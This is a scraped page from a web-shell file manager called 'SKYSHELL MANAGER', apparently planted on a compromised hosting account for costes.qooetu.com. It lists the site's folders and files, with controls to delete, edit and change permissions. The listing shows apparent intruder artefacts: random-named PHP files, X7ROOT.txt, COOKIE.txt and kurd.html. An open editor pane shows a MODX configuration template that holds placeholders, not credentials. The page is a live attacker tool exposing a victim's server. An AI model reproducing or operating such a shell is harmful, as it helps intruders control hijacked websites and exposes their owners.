📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: config.inc.php
<?php /** * MODX Configuration file */ $database_type = 'mysql'; $database_server = '[[softdbhost]]'; $database_connection_charset = 'utf8'; $table_prefix = '[[dbprefix]]'; $dbase = '[[softdb]]'; $database_user = '[[softdbuser]]'; $database_password = '[[softdbpass]]'; $database_dsn = 'mysql:host=[[softdbhost]];dbname=[[softdb]];charset=utf8'; $config_options = array ( ); $driver_options = array ( ); $lastInstallTime = [[timestamp]]; $site_id = 'modx[[site_id]]'; $site_sessionname = 'SN[[site_sessionname]]'; $https_port = '443'; $uuid = '[[uuid]]'; if (!defined('MODX_ASSETS_PATH')) { $modx_assets_path= '[[softpath]]/assets/'; $modx_assets_url= '[[relativeurl]]/assets/'; define('MODX_ASSETS_PATH', $modx_assets_path); define('MODX_ASSETS_URL', $modx_assets_url); } if (!defined('MODX_BASE_PATH')) { $modx_base_path= '[[softpath]]/'; $modx_base_url= '[[relativeurl]]/'; define('MODX_BASE_PATH', $modx_base_path); define('MODX_BASE_URL', $modx_base_url); } if (!defined('MODX_CONNECTORS_PATH')) { $modx_connectors_path= '[[softpath]]/connectors/'; $modx_connectors_url= '[[relativeurl]]/connectors/'; define('MODX_CONNECTORS_PATH', $modx_connectors_path); define('MODX_CONNECTORS_URL', $modx_connectors_url); } if (!defined('MODX_CORE_PATH')) { $modx_core_path= '[[softpath]]/core/'; define('MODX_CORE_PATH', $modx_core_path); } if (!defined('MODX_MANAGER_PATH')) { $modx_manager_path= '[[softpath]]/manager/'; $modx_manager_url= '[[relativeurl]]/manager/'; define('MODX_MANAGER_PATH', $modx_manager_path); define('MODX_MANAGER_URL', $modx_manager_url); } if (!defined('MODX_PROCESSORS_PATH')) { $modx_processors_path= '[[softpath]]/core/src/Revolution/Processors/'; define('MODX_PROCESSORS_PATH', $modx_processors_path); } if(defined('PHP_SAPI') && (PHP_SAPI == "cli" || PHP_SAPI == "embed")) { $isSecureRequest = false; } else { $isSecureRequest = ((isset($_SERVER['HTTPS']) && !empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') || parse_url('http://' . $_SERVER['HTTP_HOST'], PHP_URL_PORT) == $https_port); } if (!defined('MODX_URL_SCHEME')) { $url_scheme = $isSecureRequest ? 'https://' : 'http://'; define('MODX_URL_SCHEME', $url_scheme); } if (!defined('MODX_HTTP_HOST')) { if(defined('PHP_SAPI') && (PHP_SAPI == "cli" || PHP_SAPI == "embed")) { $http_host= '[[domhost]]'; define('MODX_HTTP_HOST', $http_host); } else { $http_host = array_key_exists('HTTP_HOST', $_SERVER) ? parse_url($url_scheme . $_SERVER['HTTP_HOST'], PHP_URL_HOST) : '[[domhost]]'; $http_port = parse_url($url_scheme . $_SERVER['HTTP_HOST'], PHP_URL_PORT); $http_host .= in_array($http_port, [null, 80, 443]) ? '' : ':' . $http_port; define('MODX_HTTP_HOST', $http_host); } } if (!defined('MODX_SITE_URL')) { $site_url= $url_scheme . $http_host . MODX_BASE_URL; define('MODX_SITE_URL', $site_url); } if (!defined('MODX_LOG_LEVEL_FATAL')) { define('MODX_LOG_LEVEL_FATAL', 0); define('MODX_LOG_LEVEL_ERROR', 1); define('MODX_LOG_LEVEL_WARN', 2); define('MODX_LOG_LEVEL_INFO', 3); define('MODX_LOG_LEVEL_DEBUG', 4); }
Save